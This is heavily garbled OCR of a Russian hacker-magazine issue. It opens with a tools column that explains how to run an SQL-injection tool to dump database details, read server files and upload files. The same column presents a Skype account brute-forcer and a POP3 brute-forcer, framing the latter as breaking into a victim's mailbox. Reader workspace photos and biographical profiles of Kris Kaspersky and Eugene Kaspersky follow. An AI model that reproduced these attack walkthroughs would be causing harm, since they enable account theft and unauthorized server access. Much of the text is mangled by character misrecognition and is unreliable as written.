b) (РЕ01ІЕ5ТТУРЕ) - 6ЕТ+(ІМ .ШСТІОМ ТУРЕ) 
-НЕАОЕР. 



X 



Метод используется, когда инъекция присутству- 
ет в хидере Соокіе. 

Пример: ЬирУ/ѵѵѵѵѵѵТагдеТги/іпсІех.рЬр 
Если уязвим параметр Соокіе (допустим, 5Ю) 
запрос на сервер принимаетвид: 



СЕТ /зсгірц .ркр?іб=1 НТТР/1.0 
Нозб : ѵтѵі. Рагдеб . ги 
Соокіе: 5Ю={80ЫШ} 
Соппесбіоп: Сіозе 



4. Также следует указать, чем прерывать ориги- 
нальный 501-запрос (опция «Сіозе 50Е») и чем 
заменять пробелы в случае фильтрации (опция 
«СИапде 5расе»). 

Теперь перейдем к работе с БД (АЫАБУ5Е БВ 
5ТРІІСТІІРЕ): 

5. В выпадающем меню ІЫ БОРМАНОМ можно 
выбрать системные переменные, которые надо 
узнать: 



БАТАВА8Е ( ) — имя базы данных, к ко- 
торой подключается скрипт для выпол- 
нения запроса. 

ТТЗЕКО — имя пользователя, от имени 
которого подключается сценарий для 
выполнения запроса. 

ѴЕК8ІОЫО — версия базы данных, к 
которой подключается скрипт для вы- 
полнения запроса. 

АЫі — выводит сразу все значения 
ІІЗЕК ( ) , БАТАВАЗЕ ( ) , ѴЕКЗІОБ ( ) . 



Иногда выводу данных может мешать ис- 
пользование различных кодировок в запро- 
се. Эту проблему решает установка галочки 
ЕІ\ІС0ВІЫ6 ЕРР0Р5 ВУРА55 (АЕ5_ЕІ\ІСРУРТ). 
Следует отметить, что здесь есть еще куча 
возможностей, с которыми ты можешь озна- 
комиться самостоятельно. 

6. Перейдем ксамой важной и нудной части 
— бруту названийтаблиц и полей. При переборе 



Программы для хакеров 



используются слова из внешнихтекстовых сло- 
варей, поэтому перед началом работы их надо 
подключить на вкладке й I СТІ О N АРУ. 

Словари бывают4-хтипов : 



— Словарь таблиц (ТаЫе бісбіопагу) 

— Словарь полей (Еіеіб. бісРіопагу) 

— Словарь префиксов (Ргеііх 
бісРіопагу ) 

— Словарь суффиксов (Зиіііх 
бісРіопагу ) 



Для использования словарей префиксов и 
суффиксов тебе необходимо отметить соот- 
ветствующие галочки на «ІІзе ргебх ітот Ліе» 
и/или «ІІвевийіхігот Іііе». А при постоянном 
использовании одного префикса или суффикса 
ты можешь просто вписать их в поля РгеЛх и 
5иіііх. Послеуказания словарей, префиксов и 
прочих опций не забудь нажать на батон «ТАВБЕ 
ВРІІТЕЕОРСЕ». 

Получить названиятаблиц и полей, используя 
таблицу ІМЕ0РМАТІ0М_5СНЕМА, — будетакту- 
альным только для Му50Б версии => 5, либо для 
М550Б. Причем, функция будет работать, если 
есть хотя бы одно поле вывода и определено 
количество полей. 

Здесьдва варианта: 

a) получать только таблицы (галочка ѲЕТТАВБЕ5 
ѴѴІТН РІ ЕЮ5 снята); 

b) получатьтаблицы с именами полей (галочка 
6ЕТТАВБЕ5 ѴѴІТН ЕІЕБОБустановлена). 

7. Работа с файлами (вкладка «РНЕ ѴѴ0РК5») так- 
же включает в себя несколько полезных функций. 
О Чтение файла: 

Функция будет работать, если есть хотя бы одно 
поле вывода и определено количество полей, а 
ЕІЕЕ_РРІѴутекущего пользователя БД установ- 
лена в «Уев». Кроме того, необходимо прописать 
абсолютный путь к файлу на сервере в поле 
«ЕІБЕ РАТН» фрейма «РЕАБ». В случае удачного 
чтения файл появится перед твоим любопыт- 
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ным взором в окне редактора, где ты можешь 
сохранить его, воспользовавшись пунктом меню 
«5АѴЕРІІІ». 

2) Чтение директории: 

Функция будет работать, если есть хотя бы одно 
поле вывода, определено количество полей, на 
сервере действует в качестве оси Фря или Сан, 
а также РІІ_Е_РРІѴу текущего пользователя БД 
установлена в «Уев». Тебе необходимо пропи- 
сать абсолютный путь к каталогу на сервере 
в поле «В ІП РАТН» фрейма «РЕАБ». В случае 
удачного чтения содержимое директории 
опять же появится перед твоим любопытным 
взором. 

3) Брутер путей: 

Функция будет работать, если есть хотя бы одно 
поле вывода, определено количество полей, а 
ЕІІ_Е_РР IV у текущего пользователя БД установ- 
лена в «Уев». Тебе нужно выбрать словарь путей 
файлов для брута — кнопка «СН005Е РНЕ» 
фрейма «РЕАБ». После чего надавить на батон 
«ВРІІТЕ РАТН5». Если файл существует на диске 
и его длина больше 0 байт (он не «пустой»), тогда 
в «БАТА БОѲ» отобразится, что такой файл есть 
на сервере. 

4) 3агрузка файла на сервер: 

Функция будет работать, если есть хотя бы одно 
поле вывода, определено количество полей и 
отсутствует экранирование кавычек. Опятьже, 
надо прописатьабсолютный путь к создаваемому 
файлу на сервере в поле «РНЕ РАТН» фрейма 
«ѴѴРІТЕ». 

Естьдва варианта заливки файла: 

• И N I О N — используется ІКІТО ВІІМРЕІБЕ (стан- 
дартный вариант); 

• ЕЫСЕ05ЕВ ВУ — используется в МуБСП, начи- 
ная сЗ-ей версии. 

Загрузка файла происходит по нажатию батона 
«ѴѴРІТЕ». 

Также существует возможность заливки файла 
с диска, если атака производится через метод 
Р05Т. Выбираем файл кнопкой «ВР0ѴѴ5Е» и 
далее нажимаем «ІІРЮАВ». 

Честно говоря, описыватьугилу можно еще долго, 
но, увы, место в журнале ограничено. Поэтому полно- 
стью полагаюсь на твое дальнейшее самостоятель- 
ное изучение. Тулза отлично зарекомендовала себя 
и по праву является одной излучшихвсвоем роде. 



ПРОГРАММА: ЗКѴРЕ ВКІЛЕК 
ОС: УІІЧСОУЗ 2000/ХР 
АВТОР: МР.ТНЕ 




Нехитрый пхп-сорец брутера 



Порой нам необходимо обзавестись определен- 
ным количеством скайповых акков. Цели сбора 
могут быть разные, а вот способов не так много. 



Одно из основных средств — это пхп-брутер, 
который я и хочутебе представить чуть ниже. 
Расписывать возможности скрипта не имеет 
смысла, ибо их не так много (возможно, расши- 
рить набор опций ты сможешь сам). Поэтому 
коротко обозначим требования для хостинга, с 
которого будет запускаться брутер: 



РНР (без ЗаРе_Мобе) 
СШЬ 



Оттебя требуется заполнить базу вида логин: 
пасс, указать прокси которые поддержива- 
ют Шрз и создать базу юзерагентов. Файлы, 
необходимые для работы скрипта, перечислены 
ниже: 



Ъазе.бхб — база вида логин: пасс 
Іод.бхб — лог скрипта (создается 
после запуска) 
иа.бхб — база юзер агентов 
ргоху.бхб — база проксей 



Во время работы брутер дописывает в логвсе 
верные пары логин: пасс, а неверные удаляет из 
списка. 

ПРОГРАММА: С11ВЕ&ЕЗКТ0Р 
0С:У№0УЗХР/ѴІЗТА 
АВТОР: ТНІІЧКІІЧС М№9 ВУНОІІЧС ВѴТЕЗ 




Прежде чем приступить к описанию следу- 
ющей софтины, хочу спросить, давно ли ты 
озадачивался проблемой эргономичности 
и удобства собственного рабочего стола? 
Конечно, речь идет не отвоем прекрасном 
деревянном столе 19-го века, выполненном из 
красного дерева, а всего лишь об интерфейсе 
Винды. Тулза под названием «СибеБезкіор» 
воплотит твои самые заветные мечты в 
реальность (при условии наличия прямых рук 
:)). Софтина представляет собой трехмерный 
рабочий стол в виде прозрачного куба для 
М5 ѴѴІпсІоѵѵз® ХР™ и М5 ѴѴІпсІоѵѵз® Ѵізіа™. 
«СиЬеВезкІор» позволяет работать с шестью 
рабочими столами, переключаться между 
которыми можно при помощи ярлыков, горячих 
клавиш или вращая куб. Причем, каждый 
рабочий стол может иметь собственный набор 
иконок, ярлыков, еіс. Система чем-то напоми- 
нает организацию нескольких рабочих столов 
вЛинухе, что, несомненно, придется подуше 
линуксоидам. 

Крометого, тулза поддерживает горячие клави- 
ши для переключения между рабочими столами, 
а также некоторые дополнительные эффекты 



(например, прозрачность окон). Прога прекрасно 
пашет каквХР.таки в Висте, а в новой версии 
добавлен еще и эффектЗБ Безкіор Роіі, набор 
обоев, менеджер иконок и много чего еще. 

Из достоинств утилы следует выделить: 



• Шесть рабочих столов 

• Обновление всех сторон Куба 

• Независимые иконки и обои для каж- 
дого стола 

• Удобное переключение кнопками в трее 

• Просмотр рабочего пространства 
наведением на кнопку номера рабочего 
стола в трее 

• Эффекты воды (ряби) 

• Плагин для быстрого переключения 
между окнами 

• Возможность перетаскивания окон 
приложений между столами 



Словом, если ты нуждаешься в повышении 
производительности, улучшении эргономики 
рабочего места или просто хочешь сменить суро- 
вую обстановку поту сторону монитора — сливай 
прогу с нашего БѴБ и радуйся жизни! 



ПРОГРАММА: Ѵ2І_0ММѴІ_А 
ОС: УІІЧ&0УЗ 2000/ХР 
АВТОР: НАСКЕКЗОГТ.КІІ 




Полнофункциональный РОРЗ-брутер 



Вопрос неправомерного доступа кчужому мыль- 
нику волнует многих. Посему — представляю твое- 
му вниманию очередной РОРЗ-брутер с нехитрым 
названием «\Мотппу1а». Тулза обладает гуишным 
интерфейсом и имеет немало опций. Разберемся 
по порядку, что и как следует за пускать. В группе 
«Основное» в поле «Сервак РОРЗ» вводим адрес 
РОРЗ-сервера, на котором располагается мыло 
жертвы. По дефолту юзается 1 10 порт, одна ко ты 
вполне можешь изменитьзначение самостоятель- 
но. Далееуказываем логин (например, іагдеі, если 
мыло вида іагдеШ***.сот). В группе «Метод под- 
бора» выбираем «По словарю» и указываем путь к 
файлу-словарю. В поле «Потоков одновременно» 
ты можешьуказать количество потоков, которое 
будет использовано ути л ой при б руте. Естест- 
венно, чем вышезначение — тем вышескорость 
брута, ножадничать не стоит. Во-первых, важную 
роль играет пропускная способностьтвоего 
собственного канала, а во-вторых, при чрезмерно 
большом количестве потоков существует вероят- 
ность пропуска тулзой искомого пароля. В общем, 
здраво оценив ширину канала и мощность железа, 
смело дави на батон «Наск к» и жди результата. ц-ц 
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^ сцена 



РАБОЧИЕМЕСТА 

ЩТАТЁЛЕИ^И 




юшт таіІ.О.х. І йдтаіі.сот) читаетжурнал СЫр. Дружно ему 
[сочувствуем А 




|Калин Руслан (коШхакер.ги) был краток. Винда, конечно, маздай ит.п. 
но вот альтернативы у нее адекватной пока нет. Убунту еще бол ьший Д 
|маздай, а макось не в счет.к ДД П„ 





1,1 ш 



|Архипов Вячеслав (агѵѵайуапбех.ги) держит на рабочем столе Йохансон. 
Вполне можем его понять.^Н^ДДН 




[Таки не скажешь, что за этим столом кто-то может работать. Ц 

Хакер (де^агйхакер.ги), наверное, долго все по своим местам^^? 
Іраскладывал.Д пц 




ІУІІзегХ (2его06(сІпагосі.ги] отдельный стол под кошака и компьютерную 
■литературу. Сума сойти! 
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щена 



» с 



Пришли на та§ап'пе@геа1. .хакер. ги фотку своего действительно хакерского 
рабочего места (в хорошем разрешении) и мы опубликуем ее в следующих 
номерах! 




ІІЛох (иЬхббОдтаіІ.сот) топит ноутбук дровами, а себя — пивом с рыбкой. 
Ывою на заднем плане мы всей редакцией сначала за какую-то оче нь 
подозрительную траву при нялиЛЭД|^^^^ИН^КВ ИУ Л ’ 1 




Александр Калашников (псОхакер.ги) живет и работает не на нехиленьком 



таком ксероксе.^ 1 




-Бихххі* (зихххН.сооКЭдппаЦ.сопп] в своем письме пишет, что любиті 
ІІІпгеаІи не любитіРбопе. Анрыл мы тожелюбим ичасто устра ива-| 
‘ем редакционные бойкіР X 




ІКаждая колоночка у те^сііс_Ье*а (бе!_ЬІг(сІтаі1.ги] больше системника 
|раза втри. Соседи его, наверно, боготворят...| 




БеЗАІБеда-хОЬк.ги] прислал свое действительно рабочее место. Эрго- 
номичное кресло, сертификаты на стене, все аккуратненько. Щ 
5*ер назвал этот стол бухгалтерским 




Іпозігасіатиз (по5І9О0хакер.ги) больше орудует ложкой, чем мышкой 
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Профайл 

Крис Касперски 

Их фамилии различаются всего на одну букву, и из-за этого их часто 
путают. Ни у одного, ни у второго восторга это не вызывает. Их жиз- 
ненные пути, в отличие от фамилий, разнятся, как черное и белое. 
Хакер и борец с вирусами. Культовые личности русской ІТ-сцены: 

Крис Касперски и Евгений Касперский. 




ЕЕПНКРИС КАСПЕРСКИ, АКА КРЫС, АКА МЫЩЪХ, АКА 
21ІМІ, АКА Ы2К, АКА Е1.КАТ0Ы, АКА501ЖІ2, АКА 
ТІКЫЗ, АКА МІІ55, АКА РАРАН, АКА МКООЫ. НАСТОЯ- 
ЕЕ ИМЯ НЕИЗВЕСТНО 
БШ5І31ПЭД 
паи 




ШІІІ 



№НЛП:иіДІПІ ХАКЕР. ПИСАТЕЛЬ. ЖУРНАЛИСТ 



Его имя хорошо знакомо каждому, кто читает наш журнал. Также оно зна- 
комо всем, кто хоть немного интересуется русской сценой (и у нас, и во 
всем мире). Талантливый журналист, не менее талантливый хакер, писа- 
тель, любимец публики и просто хороший человек — Крис Касперски. 



0 БИОГРАФИЯ 



просто некий виртуал, и хорошо, если за ним стоит один человек. Спешу 
заверить — слухи не верны. Крис абсолютно реален и был очень любе- 
зен, позволив расспросить о себе, что и сделало возможным появление 
на свет этой статьи. Над его личностью всегда колыхалась некая завеса 
тайны, во многом ставшая неотъемлемой частью образа. Поэтому полно- 
стью срывать ее мы не будем, оставив кое-что за кадром. 

Родился Крис 2 ноября 1976 года, в небольшом поселке на Северном 
Кавказе. Далее произошли две вполне логичные вещи — он подрос и 
пошел в школу. В начальных классах у Криса появился первый компьютер 
— «Правец-8Д», болгарский клон британской машины Огіс Апплов с кучей 
документации на болгарском же языке. С него все и началось. У народа 
в те дни, если что и встречалось, то «Спектрумы». Поэтому не заинтере- 
соваться было трудно. По признанию будущего хакера, крайне интересно 
было воспроизвести на машине «елочку» или запустить по экрану шарик, 
отскакивающий от стенок. Этим, в числе прочего, и озадачивался наш 
герой. 

Шли годы, развивался прогресс. Старенький «Правец-8Д» давно остался 
в прошлом, а вот увлечение компьютерами никуда не пропало. Отдельного 
упоминания заслуживает тот факт, что изучением милой сердцу области 
Крис занимался исключительно сам, читая книги и экспериментируя. 
Более того, как это ни парадоксально — у него и по сей день нет высшего 
образования. Он трижды поступал в Таганрогский радиотехнический уни- 
верситет, все три раза — успешно, но каждый раз бросал учебу в течение 
первого курса. И дело вовсе не в непрофессионализме преподавателей 
(о них Крис, напротив, отзывается очень тепло) и не в каких-то пробле- 
мах учебного заведения, а просто «самостоятельная работа» с книгами и 
справочниками импонировала Крису гораздо больше тупой зубрежки. По 
его собственным заверениям, он и очная форма обучения — вещи край- 
не плохо совместимые. Впоследствии мыщъх оставил идею о «вышке», 
придя к выводу, что можно найти себе и своему времени более рацио- 
нальное применение. 

Хотя Крис познавал тонкости кодов самостоятельно, — у любого твор- 
ческого человека рано или поздно возникает желание поделиться 
мыслями и идеями, что-то обсудить или же просто похвастаться какими- 
то наработками. К счастью, Сеть упрощает подобные вещи в десятки 
раз. Крису повезло — у него были интернет и Фидо; это позволило ему 
найти единомышленников. В те годы Фидо пользовался среди нашего 
компьютерного андеграунда куда большим уважением, чем зачатки 
рунета — неудивительно, что Касперски стал активным участником эхи 
РШНАСКЕК. 



О Крисе известно не так уж и много, несмотря на то, что он неоднократно 
давал крупным изданиям (включая наше) интервью, регулярно выпускает 
статьи и вообще, вполне досягаем для общения. Странное дело, но неко- 
торые и вовсе считают, что никакого Криса Касперски не существует, это 



Здесь стоит сделать небольшое отступление и сказать, что первая статья, 
написанная Крисом, увидела свет, когда он еще учился в школе. 

Напечатал ее журнал «Звездочет». Несложно догадаться, что посвяща- 
лась она астрономии, еще одному очень серьезному его увлечению, кото-^ 
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Евгений Касперский 



ІДВА АНТИПОДА В ОДНОЙ СТАТЬЕ 




ІЕВГЕНИЙ ВАЛЕНТИНОВИЧ КАСПЕРСКИЙ 
ІА 

(ГЕНЕРАЛЬНЫЙ ДИРЕКТОР 
«ЛАБОРАТОРИИ КАСПЕРСКОГО». ОДИН ИЗ ВЕДУЩИХ 
МИРОВЫХЭКСПЕРТОВ-АНТИВИРУСОЛОГОВ 



ИМЯ: 

ВОЗРАСТ : г'милі 
РОДДЕЯТЕЛЬНОСТИ: 



Его имя фактически является нарицательным, ведь оно используется 
в названии известнейшего на ІТ-рынке бренда. Говоря «Касперский», 
мы подразумеваем антивирус. Но нельзя забывать, что за извест- 
ным продуктом стоит живой человек, со своей уникальной историей и 
судьбой. Встречайте — программист, создатель АѴР, основатель ЗАО 
«Лаборатории Касперского» — Евгений Касперский. 

Н БИОГРАФИЯ 

Родился главный антивирусолог страны 4 октября 1965 г. в городе 
Новороссийске. После специализированной математической школы- 
интерната при МГУ Евгений окончил Институт криптографии, связи 
и информатики. Дело было в конце 80-х. В то время найти работу по 
данной специальности было не то чтобы проблемой, но, как мини- 
мум, серьезной темой для размышлений. А так как к этому моменту 
Касперский уже успел обзавестись семьей (не только женой, но и 
двумя детьми), отнестись к выбору стоило со всей ответственностью. В 
итоге, выбрана была военная область. Поводом послужили две вещи. 



Во-первых, показалась интересной идея о воспитании в себе дисцип- 
лины, чему армия определенно способствует. Во-вторых, еще в школу 
к Евгению приходили вербовщики из одного крайне закрытого НИИ 
Генштаба ВС СССР — и произвели на юношу самое приятное впечат- 
ление. 

Однако служба золотых гор не сулила, а развиваться и двигаться вперед 
— хотелось. Касперский попытался параллельно наладить подработку, 
поучаствовав в деятельности одного кооператива, занимавшегося тор- 
говлей ПК. Но затея не увенчалась успехом, если не сказать — с треском 
провалилась. Ни одной машины он так и не продал. Зато вынес из ситуа- 
ции ценный урок: менеджмент и торговля — не его стихия. 

Неизвестно, в каких еще областях он бы успел попробовать себя, 
если бы не вирус «Сазсасіе», волею случая заведшийся на его 
машине в 1989 году. Обнаружив «болезнь», Касперский без особых 
проблем сумел «препарировать» вирус (все же, вряд ли програм- 
миста средней руки взяли бы в секретный правительственный 
НИИ). Разобрав код на запчасти, он быстренько смастерил про- 
граммку, устраняющую вредоносный эффект. Вот так, практически 
случайно — и уж точно не задумываясь об этом, как о цели своей 
жизни — он написал первое «лекарство». Но за одним вирусом пос- 
ледовали и другие. Многие умельцы по всему миру в те годы «дор- 
вались» до Сети, и пока одни сеяли что-то разумное и позитивное, 
других хлебом не корми — дай сделать ближнему гадость. Словом, 
недостатка в компьютерной заразе не наблюдалось. Евгений же 
малварью серьезно заинтересовался, но все еще не помышлял о 
ней как об источнике дохода. Он просто коллекционировал трояны, 
вирусы и иже с ними, а на досуге создавал «противоядия». По сути, 
обычное хобби. 

Но слухами земля полнится. Постепенно к нему начали обращаться 
за помощью. Вначале денег «халтура» приносила мало, да и зака- 
зы попадались редко и были мелковаты. Пара сторонних клиентов 
и уже упомянутый кооператив — вот, пожалуй, все, с кем будущий 
глава одной из крупнейших антивирусных лабораторий мира имел 
дело. Само собой, такая ситуация мешала рассмотреть в этой сфере 
деятельности перспективную в будущем область рынка. Сигналом к 
действию послужил первый серьезный заказ. Крупная фирма, разра- 
батывавшая большой пакет ПО, пожелала включить в комплект анти- 
вирусную программу и обратилась к Евгению. По тем временам подоб- 
ное представлялось практически невозможным — технологии были не 
те, к тому же, ни у заказчика, ни у подрядчика не было почти никакого 
опыта. Слишком уж монументальным представлялся проект. Однако, 
попытка не пытка. Контракт подписали. 

Хотя родившаяся на выходе прога была далека от идеала, ее разработка 
все равно принесла солидные деньги. Приятной особенностью этого 
детища (приятной для заказчиков!) стал 6111, которым на тот период вре- 
мени не могли похвастаться конкуренты. Везде еще царил М5-005, рабо- 
чим инструментом являлась командная строка, а ѴѴІпсіоѵѵб только-только 
делала первые робкие шаги «в народ». Стало ясно, что хобби вполне 
способно превратиться в работу. 

А судьба, словно решив перестраховаться и опасаясь, что вышеопи- 
санный случай будет воспринят как исключение, подтверждающее 



ХАКЕР 08 / 116 / 08 



► 075 




^ сцена 



Крис Касперски 




Рабочее место настоящего хакера должно выглядеть воттак 

рое тоже зародилось в далеком детстве и осталось с ним и по сей день. 
Потом были публикации в местной газете, немало писанины «в стол» 

— и только после у Криса появился выход в Сеть. Говоря о писательстве, 



Телескопы 

Возвращаясь к теме Фидо, продолжим. В вышеупомянутую эху Крис 
начал постить примерно в 90-м году. Писал он очень активно, много и 
хорошо. Его талант подать любую информацию понятно, изящно и не 
забывая о том, что литература техническая все равно остается литерату- 
рой, на сегодня уже хорошо известен. А тогда еще только начинающего 
автора Криса Касперски заметил Дмитрий Садченко, который и устроил 
ему «знакомство» с издательством «Солон-Пресс», где позже выйдут 
многие книги Криса. Внимание на него обратили люди, работающие 
в печатных СМИ, что повлекло за собой цепь бумажных публикаций. 
Логически продолжая эту цепочку, в 1999 году «Солон» выпустили первую 
книгу Криса — «Техника и философия хакерских атак». 

За свою писательскую карьеру (а это, кстати, уже порядка 15 лет) Крис 
публиковался во множестве журналов. Среди них — «Байт», «Системный 
администратор», «Хакер» (включая этот номер:)), «Программист», 
«Компьютерра» и множество других, в том числе — зарубежные. Он 
продолжал писать и издавать книги, не лишенные весьма серьезной 
философской составляющей (на что намекает даже название его первого 
детища). Стиль Касперски сложно с кем-то спутать; в своих работах он 



«На сегодняшний день количество написанных Крисом 
статей исчисляется сотнями, вышедших книг — уже порядка 
двадцати (сюда входят и издания на английском), а он 
продолжает работать! 



мыщъх перефразирует Безрукова: «Некоторые люди испытывают такую 
же потребность писать, как коровы давать молоко. Я бы делал это (да и 
делаю) бесплатно — достаточно взглянуть на мои посты на форумах и 
оценить их длину». 

После этого вопросов «а почему он вдруг начал писать?» или «что пос- 
лужило посылом?», возникнуть не должно — ты либо пишешь, либо не 
пишешь и третьего не дано. 



не просто учит хакерским премудростям и рассказывает, как нужно взла- 
мывать и как защищаться от атак, но и задается вопросом — зачем это 
делать. 

На сегодняшний день количество написанных им статей исчис- 
ляется сотнями, вышедших книг — уже порядка двадцати (сюда 
входят и издания на английском), а Крис продолжает работать. 
Работоспособность у него нечеловеческая. Здесь вновь будет умеет- ^ 
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Касперский 

ляться — или продолжать карьеру военную, или увольняться и вплот- 
ную заниматься антивирусами. Почти все знакомые и друзья отгова- 
ривали его оставлять армию, и только жена — Наталья — поддержала. 
Догадаешься, какой выбор сделал Евгений? 



Л 




Б АѴР И «ЛАБОРАТОРИЯ КАСПЕРСКОГО» 




Пройдя сложную процедуру увольнения, в 1991 году Евгений уходит 
работать в Научно-технический центр «КАМИ», тогда еще только-только 
встающий на ноги. К созданию собственной фирмы наш герой готов 
не был, поэтому молодой и пока совсем маленький (около 10 человек] 
коллектив его вполне устроил. Более того, руководитель НТЦ — Алексей 



Старший лейтенант Касперский 



Чета Касперских 



«Евгений в одном интервью говорит о Крисе: «Никакой он не Крис, 
никакой не однофамилец, да вообще-то и не очень хакер, 
а больше астроном с Кубанской глубинки». Мнение же хакерского 
сообщества о самом Евгении цензура в печать не пустила» 



правило, подкинула Евгению еще один довольно серьезный контракт. 
Теперь «на руках» имелась партия компьютеров, которую нужно было 
оснастить защитой. Дело было сделано. Машины, укомплектованные 
антивирями, продались хорошо, опять же принеся неплохой заработок. 
Заработанные деньги на этот раз Касперски вложил в свою первую книгу 
«Компьютерные вирусы в МЗ-йОЗ», издав ее самостоятельно. Теперь 
отрицать выгоду стало и вовсе глупо, наметилась определенная тенден- 
ция. 

То, во что трансформировалось его хобби, отнимало все больше и 
больше времени. Касперский активно интересовался темой, начал 
посещать всевозможные конференции и форумы софт-разработчиков, 
писать статьи, — но делать все приходилось в свободное от работы 
время. Между прочим, работая в секретном НИИ, сложно вести актив- 
ную публичную деятельность и выступать на различных мероприятиях. 
Каждый момент приходилось постоянно проговаривать с начальством. 
Стало ясно, что долго так продолжаться не может. Пора было опреде- 



Ремизов — Евгения хорошо знал и всецело ему доверял. Уже на тот 
момент Касперский был фигурой довольно известной, и специально 
для него в «КАМИ» создали новый отдел — антивирусных разработок. 

Первое время весь персонал отдела ограничивался самим Евгением. Но 
зато ему дали полноценное рабочее место, компьютер и возможность тво- 
рить. Пришла пора наверстывать упущенное, ведь то, что представляли 
собой его тогдашние наработки, вряд ли могло бы выжить на стреми- 
тельно разросшемся рынке. Среди отечественных продуктов тогда твердо 
лидировало детище Лозинского — Аісізіезі; ну и западные монстры вроде 
МсАІюе и Ыогіоп АпііѴігиз, который появился в 1992 году, оставляли мало- 
вато пространства для маневра. 

Работая не покладая рук, по 12 часов в сутки, без отпусков и частенько 
— без выходных, Касперский принялся за создание собственного анти- 
вируса, практически воплощая мечту. Постепенно в отделе, помимо него, 
появились другие специалисты. Антивирусные базы существенно расши- 
рились. Словом — процесс пошел. ж 
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на цитата: «Последние пять лет я пишу от 1 0 до 15 статей в месяц, 
иногда больше, но очень редко — меньше». Отметим, что одни статьи 
пишутся экспромтом, другие же таят в себе годы исследований той 
или иной темы. Назвать точное количество своих публикаций Крис 
затруднился, признавшись, что после 200 считать перестал, а это 
было давно. По моим подсчетам, сегодня их число пребывает где-то 
между 800 и 1000 — среди них немало материалов не совсем хакер- 
ской или даже совсем не хакерской тематики. Яркий тому пример 
— книга Криса «Энциклопедия примет погоды. Предсказание погоды 
по местным признакам». Сам Касперски шутит, что писать у него 
получается гораздо лучше, чем, собственно ломать, кодить и готовить- 
ся к процессу написания. 

Постепенно все это начало приносить не только гонорары и любовь чита- 
телей, но и предложения о сотрудничестве. Как аналитиком и секьюрити- 
специалистом Крисом заинтересовались многие ІТ-компании с мировыми 
именами. Это опять же неудивительно, ведь в своих статьях и постах он 
рассматривал очень интересные вещи. По мере того, как мыщъх изучал 
язык (имеется в виду английский :)], партнеров становилось все больше, 
а заказы — серьезнее. 

К текущему моменту, по его словам, работы столько, что нужно 
только успевать выбирать. Основная его деятельность сконцент- 
рирована по направлениям дизассемблирования малвари, разра- 
ботки защитных механизмов, обработки цифрового аудио и видео, 
оптимизации, системного программирования. Для примера, один 
из последних заказов — серия статей для блога зарубежной компа- 
нии по безопасности. 

Работает Крис по-прежнему удаленно, хотя его регулярно зовут в штат, 
заграницу, с каждым разом выдвигая предложения все интереснее и 
интереснее. Но Крис остается верен себе, предпочитая постоянной рабо- 
те фриланс. 

0 ФАКТЫ О КРИСЕ 

Казалось бы, что еще можно добавить? Рассказали о работе — значит, 
рассказали о Крисе Касперски. Он говорит, что полностью отождествляет 
себя с работой. Однако интересного осталось еще много. 

Например, как уже упоминалось, мыщъх с детства серьезно увлечен аст- 
рономией. Ныне, правда, у него не хватает времени на любимое хобби, и 
телескопы пылятся по углам. Но когда-то Касперски сказал в интервью, 
что не хотел бы жить в городе как раз потому, что там совсем не видно 
звезд из-за сильной засветки. 

В этом смысле Крис тоже себе не изменяет — живет в своем доме, 
в 30 км от Армавира, подальше от душных муравейников-мегаполи- 
сов. И хотя его с завидной регулярностью приглашают на всяческие 
конференции, семинары, форумы и тому подобные мероприятия, 
посещает он их крайне редко. Побывав на конференции Спрыг2к, 
он, что называется, набрался впечатлений на всю оставшуюся жизнь. 
Впрочем, играет роль и банальная нехватка времени — с таким коли- 
чеством работы не всегда удается даже выспаться или съездить в 
горы, которые несоизмеримо ближе к Крису, чем Москва или Питер. 
Вообще, Касперски очень нелестно отзывался об уровне организации 
наших конференций. Зарубежные аналоги вызывают у него несколько 
больший энтузиазм. 

Заведя разговор о других странах, нельзя не упомянуть языки, которыми 
Крис владеет. Хотя он очень скромный парень и к своим познаниям и 
талантам относится с большой долей скепсиса, вот что он ответил на 
вопрос о языках: «Английский — ну, для общения знаний хватает. Писать 
свою первую книгу на нем я еще не готов. А в принципе, общаюсь и с 
китайцами — иероглифы не так уж сложны, если они в электронном 
виде и под рукой есть словари. Тайский язык тоже простой. Там алфа- 
вит типа нашего, хоть и другой. В малайском используется латиница. 




Испанский — вообще простой, как двигатель от «запора». Французский... 
Ну, так. Читаю статьи, но сам говорить не могу. То же самое относится 
к немецкому». А тебе, дорогой читатель, слабо пообщаться с китайцем, 
даже по уши обложившись словарями? Лично мне — да. Пожалуй, про 
тайский и малайский я промолчу. 

В отношении самого себя Крис очень самокритичен и почти никогда не 
бывает удовлетворен достигнутым. Оглядываться назад, на уже вышед- 
шие книги, написанные статьи и законченные проекты, он не любит. 
Говорит, что сразу видит, где и что можно было бы улучшить и перерабо- 
тать. Когда-то давно он искренне хотел, чтобы о нем узнали, но получив 
признание, понял, что ему, в общем-то, все равно. С одной стороны, он, 
конечно, сделал себе имя, с другой — мешает оно не меньше, чем помо- 
гает. Мешает, в первую очередь, хакерской деятельности, потому что 
крайне сложно ломать, будучи у всех на виду. Но, как водится, у медали 
есть и обратная сторона — известное имя точно также и защищает от 
возможных последствий взломов. Вряд ли здесь могла бы повториться 
история Склярова. А относительно самокритичности — позволю себе 
еще одну, последнюю, цитату: «На интервью я утверждаю, что знаю толь- 
ко Си и Асм, но не Си++, потому что я его реально не знаю. Хотя 99,999% 
утверждающих, что они знают «плюсы», это вообще идиоты, не знающие, 
чего они вообще не знают. Зато когда выясняется, что Си++ я все-таки 
знаю, — это уже бонус». Словом, Крис крайне не любит, когда его заслу- 
ги и познания преувеличивают, а делают это, по его мнению, практичес- 
ки все. Сложившийся вокруг имени образ опять же дает о себе знать. 
Подводя некий итог и зная нежелание Криса, чтобы ему пели дифирамбы 
и называли гением, скажу, что Крис Касперски, все же, ярчайший пример 
того, чего может добиться неглупый человек, поставив перед собой опре- 
деленную цель и при этом занимаясь любимым делом. Пожалуй, остается 
только пожелать ему дальнейших успехов в творчестве и чистого неба 
над головой. 

Н ЭТО ИНТЕРЕСНО 

• Все ники Криса — это слово «мышь» на разных языках мира. Иногда 
специально чуть искаженные, например: воигіз (франц) зоигіг. 

• Крис всегда подписывается мыщъхом (а редактора мышъхей не любят 
и старательно их режут, - Прим, редакции), чтобы не было путаницы с его 
«тезкой», Евгением Касперским, главой антивирусной лаборатории. 

• Крис Касперски тоже псевдоним; от имени Каспера — доброго при- 
ведения. цц 
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Уже к 1994 году АпііѴігаІ Тооікіі Рго (такое имя получил проект) стал 
выглядеть относительно законченным. Его уже не стыдно было 
посылать на тестирования в известные университеты и институты, 
что Касперский и не замедлил сделать (воспользовавшись нарабо- 
танными ранее связями). Он отправил АТР в университет Гамбурга, 
но, прикладывая программу к письму, случайно опечатался, назвав 
